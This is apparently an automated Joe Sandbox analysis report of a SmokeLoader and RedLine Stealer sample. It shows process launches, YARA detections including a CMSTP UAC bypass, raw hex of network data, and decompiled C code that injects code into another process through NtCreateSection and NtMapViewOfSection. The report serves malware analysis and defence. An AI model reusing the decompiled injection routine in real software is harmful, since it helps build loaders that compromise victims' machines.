                                                        2022-11-20 22:29:22 UTC593INData Raw: 32 30 30 30 0d 0a ff ff ff ff ff ff 00 00 ff ff ff f0 ff ff 00 00 ff 07 ff f7 1f ff 00 00 ff 10 ff f7 cf ff 00 00 ff 1c 1f f3 f3 ff 00 00 ff c7 03 f9 f8 ff 00 00 ff e3 9c fc fe 7f 00 00 ff f1 cf 1e ff 3f 00 00 ff f8 cf e1 78 1f 00 00 fe 00 1f fc 1f ff 00 00 ff 3f ff ff 9f ff 00 00 ff 87 ff ff ff ff 00 00 ff f0 03 ff ff ff 00 00 ff ff fc 3f ff ff 00 00 ff ff ff 1f ff ff 00 00 ff ff ff 07 ff ff 00 00 ff ff ff 93 ff ff 00 00 ff ff ff cc ff ff 00 00 ff ff ff f0 3f ff 00 00 ff f1 ff f0 8f ff 00 00 ff e0 ff f7 d7 ff 00 00 ff e0 ff f7 e9 ff 00 00 ff e0 ff fb e4 ff 00 00 ff 81 ff f1 f6 7f 00 00 ff 81 ff f4 73 7f 00 00 9f 81 ff fa 13 3f 00 00 8f 03 ff fb 07 bf 00 00 86 07 ff c5 ef bf 00 00 82 07 ff c8 e7 bf 00 00 80 0f ff e6 37 3f 00 00 80 0f ff fb 00 7f 00 00 80
                                                        Data Ascii: 2000?x???s?7?
                                                        2022-11-20 22:29:22 UTC601INData Raw: 00 00 00 00 00 00
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC601INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC601INData Raw: 31 32 34 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: 1248



                                                        Target ID:1
                                                        Start time:23:28:01
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\Desktop\file.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\file.exe
                                                        Imagebase:0x400000
                                                        File size:310272 bytes
                                                        MD5 hash:8691765A5EF6354D21BD12C83E9DF20B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low

                                                        Target ID:4
                                                        Start time:23:28:11
                                                        Start date:20/11/2022
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff618f60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high

                                                        Target ID:5
                                                        Start time:23:28:58
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\AppData\Roaming\cgjtubb
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\cgjtubb
                                                        Imagebase:0x400000
                                                        File size:310272 bytes
                                                        MD5 hash:8691765A5EF6354D21BD12C83E9DF20B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.431504575.000000000052B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.430978664.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        Reputation:low

                                                        Target ID:8
                                                        Start time:23:29:06
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\FD31.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\FD31.exe
                                                        Imagebase:0x400000
                                                        File size:1134592 bytes
                                                        MD5 hash:823B2BD8B63CAFBEA781C59993109B99
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.444948921.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.443911469.000000000218A000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        Reputation:low

                                                        Target ID:9
                                                        Start time:23:29:10
                                                        Start date:20/11/2022
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp",Tiuqiiueaur
                                                        Imagebase:0xb00000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:10
                                                        Start time:23:29:21
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\2B26.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\2B26.exe
                                                        Imagebase:0x400000
                                                        File size:619008 bytes
                                                        MD5 hash:B30C788530FD281E8C434DA4B8214DB4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.473645142.0000000000413000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.475894264.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.474957989.000000000078B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        Reputation:low

                                                        Target ID:15
                                                        Start time:23:29:27
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\2B26.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\2B26.exe"
                                                        Imagebase:0x400000
                                                        File size:619008 bytes
                                                        MD5 hash:B30C788530FD281E8C434DA4B8214DB4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.494179230.0000000000413000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.494410368.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.494599306.0000000000831000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low

                                                        Target ID:17
                                                        Start time:23:30:01
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\AppData\Roaming\cgjtubb
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\cgjtubb
                                                        Imagebase:0x400000
                                                        File size:310272 bytes
                                                        MD5 hash:8691765A5EF6354D21BD12C83E9DF20B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.581088904.0000000000631000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.580849383.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low


                                                          Execution Graph

                                                          Execution Coverage:5.7%
                                                          Dynamic/Decrypted Code Coverage:69.8%
                                                          Signature Coverage:34.9%
                                                          Total number of Nodes:172
                                                          Total number of Limit Nodes:10

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b6a512c9d6eb5ca3050d385883f3a76be4b42a11236a0a405a38c14e89f911b
                                                          • Instruction ID: 67db8dc375151bfe257540867c3d287c712409260c0918a2d7cc4bffad82e0fd
                                                          • Opcode Fuzzy Hash: 9b6a512c9d6eb5ca3050d385883f3a76be4b42a11236a0a405a38c14e89f911b
                                                          • Instruction Fuzzy Hash: 22912472600204ABDB219FA1CC44EEF7BB8EF81B14F10467AFA12BB1F5D6759905CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 59%
                                                          			E004014A8(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				char _v8;
                                                          				long _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				char _v44;
                                                          				char _v52;
                                                          				long _v56;
                                                          				long _v60;
                                                          				char _v64;
                                                          				char _v68;
                                                          				char _v72;
                                                          				char _v76;
                                                          				char _v84;
                                                          				char _v88;
                                                          				char _v92;
                                                          				intOrPtr _v96;
                                                          				char _v100;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __ebp;
                                                          				void* _t84;
                                                          				intOrPtr _t87;
                                                          				long _t90;
                                                          				void* _t91;
                                                          				struct _GUID _t98;
                                                          				struct _GUID _t100;
                                                          				PVOID* _t102;
                                                          				PVOID* _t104;
                                                          				intOrPtr _t106;
                                                          				intOrPtr* _t108;
                                                          				PVOID* _t121;
                                                          				PVOID* _t123;
                                                          				intOrPtr _t127;
                                                          				intOrPtr _t128;
                                                          				intOrPtr _t129;
                                                          				long* _t130;
                                                          				signed int _t137;
                                                          				int _t138;
                                                          				signed int _t157;
                                                          				signed int _t158;
                                                          				signed int _t159;
                                                          				void* _t160;
                                                          				intOrPtr* _t161;
                                                          				void* _t164;
                                                          				void* _t171;
                                                          				long _t172;
                                                          				intOrPtr _t173;
                                                          				void* _t174;
                                                          				long* _t180;
                                                          				intOrPtr* _t181;
                                                          				HANDLE* _t182;
                                                          				HANDLE* _t183;
                                                          				void* _t188;
                                                          				void* _t189;
                                                          				intOrPtr* _t192;
                                                          				void* _t193;
                                                          				intOrPtr _t196;
                                                          				intOrPtr* _t197;
                                                          				intOrPtr* _t198;
                                                          				void* _t200;
                                                          				intOrPtr* _t201;
                                                          				void* _t202;
                                                          				long _t217;
                                                          
                                                          				_t84 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t128 =  *_t197;
                                                          				_t198 = _t197 + 4;
                                                          				L0040119E(_t84, _t128, _t171, __eflags);
                                                          				_t127 = _a4;
                                                          				_t172 = 0;
                                                          				_v56 = 0;
                                                          				if(gs != 0) {
                                                          					_v56 = _v56 + 1;
                                                          				}
                                                          				while(1) {
                                                          					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
                                                          					if(_t87 != 0) {
                                                          						break;
                                                          					}
                                                          					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                                                          				}
                                                          				_v96 = _t87;
                                                          				_t180 =  &_v100;
                                                          				 *_t180 = _t172;
                                                          				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
                                                          				_t90 =  *_t180;
                                                          				if(_t90 != 0) {
                                                          					_t130 =  &_v52;
                                                          					 *_t130 = _t90;
                                                          					_t130[1] = _t172;
                                                          					_t181 =  &_v44;
                                                          					 *((intOrPtr*)(_t127 + 0x10))(_t181, 0x18);
                                                          					 *_t181 = 0x18;
                                                          					_push( &_v52);
                                                          					_push(_t181);
                                                          					_push(0x40);
                                                          					_push( &_v20);
                                                          					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t172, _t172, 2) == 0) {
                                                          						_v12 = _t172;
                                                          						_t98 =  &_v84;
                                                          						 *(_t98 + 4) = _t172;
                                                          						 *_t98 = 0x5000;
                                                          						_t182 =  &_v88;
                                                          						if(NtCreateSection(_t182, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
                                                          							_push(_v84);
                                                          							_pop( *_t25);
                                                          							_t121 =  &_v72;
                                                          							 *_t121 = _t172;
                                                          							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                                                          								_t123 =  &_v64;
                                                          								 *_t123 = _t172;
                                                          								if(NtMapViewOfSection( *_t182, _v16, _t123, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                                                          									_t196 = _v72;
                                                          									 *((intOrPtr*)(_t127 + 0x20))(_t172, _t196, 0x104);
                                                          									 *((intOrPtr*)(_t196 + 0x208)) = _a16;
                                                          									_v12 = _v12 + 1;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t100 =  &_v84;
                                                          						 *(_t100 + 4) = _t172;
                                                          						 *_t100 = _a12 + 0x10000;
                                                          						_t183 =  &_v92;
                                                          						if(NtCreateSection(_t183, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 && _v12 != 0) {
                                                          							_push(_v84);
                                                          							_pop( *_t46);
                                                          							_t102 =  &_v76;
                                                          							 *_t102 = _t172;
                                                          							if(NtMapViewOfSection( *_t183, 0xffffffff, _t102, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                                                          								_t104 =  &_v68;
                                                          								 *_t104 = _t172;
                                                          								_t217 = NtMapViewOfSection( *_t183, _v16, _t104, _t172, _t172, _t172,  &_v60, 1, _t172, 0x20);
                                                          								if(_t217 == 0) {
                                                          									L21();
                                                          									if(_t217 == 0 && _t217 != 0) {
                                                          									}
                                                          									_t200 = _t198 + 4;
                                                          									_push(0x2e62);
                                                          									_t201 = _t200 + 4;
                                                          									_push(0x2260);
                                                          									_t106 =  *_t201;
                                                          									_t202 = _t201 + 4;
                                                          									_t157 = (0x2260 << 5) + _t106;
                                                          									asm("lodsb");
                                                          									_t158 = _t157;
                                                          									asm("loop 0xffffffc2");
                                                          									_t159 = _t158 ^ 0xbcc951dd;
                                                          									_t198 = _t202 - _t159;
                                                          									_t188 = _a8 +  *_a8;
                                                          									_t137 =  *(_t188 + 6) & 0x0000ffff;
                                                          									_push(_t188);
                                                          									_t160 = _t188;
                                                          									if(_v56 == 0) {
                                                          										_t161 = _t160 + 0xf8;
                                                          										__eflags = _t161;
                                                          									} else {
                                                          										_t161 = _t160 + 0x108;
                                                          									}
                                                          									_push(_t137);
                                                          									_t138 =  *(_t161 + 0x10);
                                                          									if(_t138 != 0) {
                                                          										memcpy( *((intOrPtr*)(_t161 + 0xc)) + _v76,  *((intOrPtr*)(_t161 + 0x14)) + _a8, _t138);
                                                          										_t198 = _t198 + 0xc;
                                                          									}
                                                          									asm("loop 0xffffffe6");
                                                          									_pop(_t189);
                                                          									_t222 = _v56;
                                                          									if(_v56 == 0) {
                                                          										_push(_t189);
                                                          										_t164 =  *((intOrPtr*)(_t189 + 0x34)) - _v68;
                                                          										_t192 =  *((intOrPtr*)(_t189 + 0xa0)) + _v76;
                                                          										__eflags = _t192;
                                                          										while(1) {
                                                          											__eflags =  *_t192;
                                                          											if( *_t192 == 0) {
                                                          												break;
                                                          											}
                                                          											_t173 =  *_t192;
                                                          											_t192 = _t192 + 8;
                                                          											asm("lodsw");
                                                          											__eflags = 0;
                                                          											if(0 != 0) {
                                                          												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
                                                          												__eflags =  *((intOrPtr*)(0 + _v76 + _t173));
                                                          											}
                                                          											asm("loop 0xffffffe9");
                                                          										}
                                                          										_pop(_t193);
                                                          										_t172 = 0;
                                                          										__eflags = 0;
                                                          										_t108 =  &_v8;
                                                          										 *_t108 = 0;
                                                          										 *((intOrPtr*)(_t127 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t193 + 0x28)) + _v68, _v64, _t108, 0);
                                                          									} else {
                                                          										L54();
                                                          										_pop(_t174);
                                                          										_t172 = _t174 - 0x1760;
                                                          										 *((intOrPtr*)(_t172 + 0x1794)) = _t172 + 0x2c17;
                                                          										L00401227(_t127, _t172, _t222, _t172 + 0x2c17, 0x1ad);
                                                          										0x33();
                                                          										 *((intOrPtr*)(_t172 + 0x17b9)) = _t172 + 0x2c67;
                                                          										0x33();
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t91 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t129 =  *_t198;
                                                          				return L0040119E(_t91, _t129, _t172, _t222);
                                                          			}

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                                                          • Instruction ID: cd3d7ef155730ff18c04e90283d35d9337f0c2e1175127a0e4488d23b7b2eda1
                                                          • Opcode Fuzzy Hash: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                                                          • Instruction Fuzzy Hash: B6511871900249BBEB219F91CC48FEBBBB9EF85B10F104129FA11BA2E5D7749941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 200 4014b3-4014c4 202 4014db 200->202 203 4014cc-4014f1 call 40119e 200->203 202->203 207 4014f3 203->207 208 4014f6-4014fb 203->208 207->208 210 401501-401512 208->210 211 401824-40182c 208->211 215 401822 210->215 216 401518-401541 210->216 211->208 214 401831-401842 211->214 218 401845-401866 call 40119e 214->218 219 401838-40183e 214->219 215->214 216->215 226 401547-40155e NtDuplicateObject 216->226 219->218 226->215 228 401564-401588 NtCreateSection 226->228 230 4015e4-40160a NtCreateSection 228->230 231 40158a-4015ab NtMapViewOfSection 228->231 230->215 233 401610-401614 230->233 231->230 232 4015ad-4015c9 NtMapViewOfSection 231->232 232->230 234 4015cb-4015e1 232->234 233->215 235 40161a-40163b NtMapViewOfSection 233->235 234->230 235->215 236 401641-40165d NtMapViewOfSection 235->236 236->215 238 401663 call 401668 236->238
                                                          C-Code - Quality: 63%
                                                          			E004014B3(void* __ebx, void* __edi, void* __eflags) {
                                                          				void* _t84;
                                                          				intOrPtr _t87;
                                                          				long _t90;
                                                          				void* _t91;
                                                          				struct _GUID _t98;
                                                          				struct _GUID _t100;
                                                          				PVOID* _t102;
                                                          				PVOID* _t104;
                                                          				intOrPtr _t106;
                                                          				intOrPtr* _t108;
                                                          				PVOID* _t121;
                                                          				PVOID* _t123;
                                                          				intOrPtr _t128;
                                                          				intOrPtr _t130;
                                                          				intOrPtr _t131;
                                                          				long* _t132;
                                                          				signed int _t139;
                                                          				int _t140;
                                                          				signed int _t161;
                                                          				signed int _t162;
                                                          				signed int _t163;
                                                          				void* _t164;
                                                          				intOrPtr* _t165;
                                                          				void* _t168;
                                                          				long _t176;
                                                          				intOrPtr _t178;
                                                          				void* _t179;
                                                          				long* _t185;
                                                          				intOrPtr* _t187;
                                                          				HANDLE* _t188;
                                                          				HANDLE* _t189;
                                                          				void* _t194;
                                                          				void* _t195;
                                                          				intOrPtr* _t198;
                                                          				void* _t199;
                                                          				void* _t202;
                                                          				void* _t203;
                                                          				void* _t205;
                                                          				intOrPtr* _t206;
                                                          				intOrPtr* _t207;
                                                          				void* _t210;
                                                          				intOrPtr* _t211;
                                                          				void* _t212;
                                                          				long _t227;
                                                          
                                                          				_t206 = _t205 + 1;
                                                          				_t84 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t130 =  *_t206;
                                                          				_t207 = _t206 + 4;
                                                          				L0040119E(_t84, _t130, __edi, __eflags);
                                                          				_t128 =  *((intOrPtr*)(_t203 + 8));
                                                          				_t176 = 0;
                                                          				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                                                          				if(gs != 0) {
                                                          					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                                                          				}
                                                          				while(1) {
                                                          					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                                                          					if(_t87 != 0) {
                                                          						break;
                                                          					}
                                                          					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                          				}
                                                          				 *((intOrPtr*)(_t203 - 0x5c)) = _t87;
                                                          				_t185 = _t203 - 0x60;
                                                          				 *_t185 = _t176;
                                                          				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t185);
                                                          				_t90 =  *_t185;
                                                          				if(_t90 != 0) {
                                                          					_t132 = _t203 - 0x30;
                                                          					 *_t132 = _t90;
                                                          					_t132[1] = _t176;
                                                          					_t187 = _t203 - 0x28;
                                                          					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
                                                          					 *_t187 = 0x18;
                                                          					_push(_t203 - 0x30);
                                                          					_push(_t187);
                                                          					_push(0x40);
                                                          					_push(_t203 - 0x10);
                                                          					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
                                                          						 *(_t203 - 8) = _t176;
                                                          						_t98 = _t203 - 0x50;
                                                          						 *(_t98 + 4) = _t176;
                                                          						 *_t98 = 0x5000;
                                                          						_t188 = _t203 - 0x54;
                                                          						if(NtCreateSection(_t188, 6, _t176, _t98, 4, 0x8000000, _t176) == 0) {
                                                          							 *_t25 =  *(_t203 - 0x50);
                                                          							_t121 = _t203 - 0x44;
                                                          							 *_t121 = _t176;
                                                          							if(NtMapViewOfSection( *_t188, 0xffffffff, _t121, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                          								_t123 = _t203 - 0x3c;
                                                          								 *_t123 = _t176;
                                                          								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t123, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                          									_t202 =  *(_t203 - 0x44);
                                                          									 *((intOrPtr*)(_t128 + 0x20))(_t176, _t202, 0x104);
                                                          									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                                                          									 *(_t203 - 8) =  *(_t203 - 8) + 1;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t100 = _t203 - 0x50;
                                                          						 *(_t100 + 4) = _t176;
                                                          						 *_t100 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                                                          						_t189 = _t203 - 0x58;
                                                          						if(NtCreateSection(_t189, 0xe, _t176, _t100, 0x40, 0x8000000, _t176) == 0 &&  *(_t203 - 8) != 0) {
                                                          							 *_t46 =  *(_t203 - 0x50);
                                                          							_t102 = _t203 - 0x48;
                                                          							 *_t102 = _t176;
                                                          							if(NtMapViewOfSection( *_t189, 0xffffffff, _t102, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                          								_t104 = _t203 - 0x40;
                                                          								 *_t104 = _t176;
                                                          								_t227 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t104, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 0x20);
                                                          								if(_t227 == 0) {
                                                          									L20();
                                                          									if(_t227 == 0 && _t227 != 0) {
                                                          									}
                                                          									_t210 = _t207 + 4;
                                                          									_push(0x2e62);
                                                          									_t211 = _t210 + 4;
                                                          									_push(0x2260);
                                                          									_t106 =  *_t211;
                                                          									_t212 = _t211 + 4;
                                                          									_t161 = (0x2260 << 5) + _t106;
                                                          									asm("lodsb");
                                                          									_t162 = _t161;
                                                          									asm("loop 0xffffffc2");
                                                          									_t163 = _t162 ^ 0xbcc951dd;
                                                          									_t207 = _t212 - _t163;
                                                          									_t194 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
                                                          									_t139 =  *(_t194 + 6) & 0x0000ffff;
                                                          									_push(_t194);
                                                          									_t164 = _t194;
